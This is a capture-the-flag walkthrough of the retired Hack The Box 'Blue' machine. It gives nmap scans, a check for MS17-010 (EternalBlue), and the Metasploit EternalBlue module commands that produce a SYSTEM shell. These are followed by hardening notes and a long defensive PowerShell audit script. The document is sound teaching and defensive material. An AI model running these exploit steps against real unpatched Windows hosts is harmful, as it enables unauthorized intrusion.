HTB: Blue — EternalBlue (MS17-010)

Full walkthrough. Enumeration → surface identification → exploitation → reinforcement notes.


Overview

Blue is a retired Windows machine on Hack The Box running an unpatched SMBv1 service vulnerable to MS17-010 (EternalBlue). The attack chain is: enumerate open ports → detect SMB vuln → exploit via Metasploit → retrieve both flags as SYSTEM.

This is a pure lab exercise on an authorized retired HTB machine. No real-world systems were involved.

Enumeration

Full port scan with version and default script detection:

nmap -sV -sC -p- --open -T4 10.10.10.40

Notable services: 135/tcp MSRPC, 139/tcp NetBIOS, 445/tcp SMB.

OS fingerprint: Windows 7 / Windows Server 2008 R2. SMB signing disabled.

Vulnerability Detection

nmap -p 445 --script smb-vuln-ms17-010 10.10.10.40

Result: VULNERABLE — Remote Code Execution via MS17-010 (EternalBlue). CVSSv3: 9.8 Critical.

Exploitation

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST <tun0 ip>
run

A Meterpreter session opens as NT AUTHORITY\SYSTEM — no privilege escalation step needed.

Post-Exploitation

  • User flag: C:\Users\haris\Desktop\user.txt
  • Root flag: C:\Users\Administrator\Desktop\root.txt

Reinforcement Notes

  • Disable SMBv1. No modern workload requires it.
  • Apply MS17-010 patch. KB4012212 (Win7) / KB4012215 (Server 2008 R2).
  • Restrict SMB at perimeter. Block 445 inbound at firewall/VLAN boundary.
  • EDR + SIEM. Alert on SMB exploit signatures (e.g. MS17-010 IDS rules).
  • Network segmentation. Limit lateral movement blast radius.
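The host-side half of these notes, as an added example written for this page (not a script from the original walkthrough or its download bundle): an elevated PowerShell audit that reports whether SMBv1 is enabled, whether SMB signing is required, and whether either MS17-010 KB from the list above is installed, with an optional remediation pass. Assumptions not taken from the page: the `LanmanServer\Parameters` registry values `SMB1` and `RequireSecuritySignature` (Microsoft's documented settings for Windows 7 / Server 2008 R2), the `*-SmbServerConfiguration` cmdlets on Server 2012 and later, and the SMB1 access audit log (`Microsoft-Windows-SMBServer/Audit`, event 3000) that exists only on Windows 10 / Server 2016 and later. Later cumulative rollups supersede the two KBs, so an empty patch list on a current build is a prompt to check rollup history, not proof of exposure.

```powershell
# Added example for the reinforcement notes above; not part of the original walkthrough.
# Run as Administrator. Audit only by default; pass -Remediate to apply the changes.
# Assumed (not from the page): registry value names, Smb cmdlet availability, audit log name.

$Params     = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$Ms17010Kbs = @('KB4012212', 'KB4012215')   # KBs listed in the walkthrough's reinforcement notes
$Remediate  = $args -contains '-Remediate'

function Get-Smb1Enabled {
    # Server 2012+ exposes the setting through Get-SmbServerConfiguration; Windows 7 /
    # Server 2008 R2 only have the registry value, and a missing value means SMB1 is ON.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return [bool](Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    $v = Get-ItemProperty -Path $Params -Name SMB1 -ErrorAction SilentlyContinue
    if ($null -eq $v) { return $true }
    return ($v.SMB1 -ne 0)
}

function Get-SigningRequired {
    $v = Get-ItemProperty -Path $Params -Name RequireSecuritySignature -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.RequireSecuritySignature -eq 1)
}

function Get-Ms17010Patches {
    # Installed KBs from the list; an empty result means neither March 2017 package is present.
    Get-HotFix -ErrorAction SilentlyContinue |
        Where-Object { $Ms17010Kbs -contains $_.HotFixID } |
        Select-Object -ExpandProperty HotFixID
}

function Get-Smb1Clients {
    # Clients that still negotiated SMB1 (event 3000) - check this BEFORE disabling SMB1
    # so a legacy scanner or NAS does not break silently. Requires Win10 / Server 2016+
    # with 'Set-SmbServerConfiguration -AuditSmb1Access $true' already enabled.
    $log = 'Microsoft-Windows-SMBServer/Audit'
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 3000 } -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Message } | Sort-Object -Unique
}

# ---- audit ----
$report = [pscustomobject]@{
    Host            = $env:COMPUTERNAME
    Smb1Enabled     = Get-Smb1Enabled
    SigningRequired = Get-SigningRequired
    Ms17010Patches  = @(Get-Ms17010Patches)
    Smb1ClientsSeen = @(Get-Smb1Clients).Count
}
$report | Format-List

# ---- remediate ----
if ($Remediate) {
    if ($report.Smb1Enabled) {
        if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
            Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        } else {
            # Windows 7 / Server 2008 R2 path; takes effect once the Server service restarts.
            Set-ItemProperty -Path $Params -Name SMB1 -Type DWord -Value 0 -Force
            Write-Warning 'SMB1 registry value set; restart the Server (LanmanServer) service to apply.'
        }
    }
    if (-not $report.SigningRequired) {
        # The scan showed signing disabled; requiring it blocks SMB relay and in-path tampering.
        Set-ItemProperty -Path $Params -Name RequireSecuritySignature -Type DWord -Value 1 -Force
    }
    if ($report.Ms17010Patches.Count -eq 0) {
        Write-Warning 'No MS17-010 KB found. Install the March 2017 package or a later cumulative rollup.'
    }
}
```

Perimeter filtering of 445 and network segmentation are outside what a host script can verify, so the last two notes still need a firewall or switch-side check; this script covers the three host controls.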

Downloads

htb-blue-enum.sh: Nmap + SMB enumeration script sequence used in this walkthrough.

htb-blue-walkthrough.md: Step-by-step written walkthrough — scope, method, findings, and reinforcement.
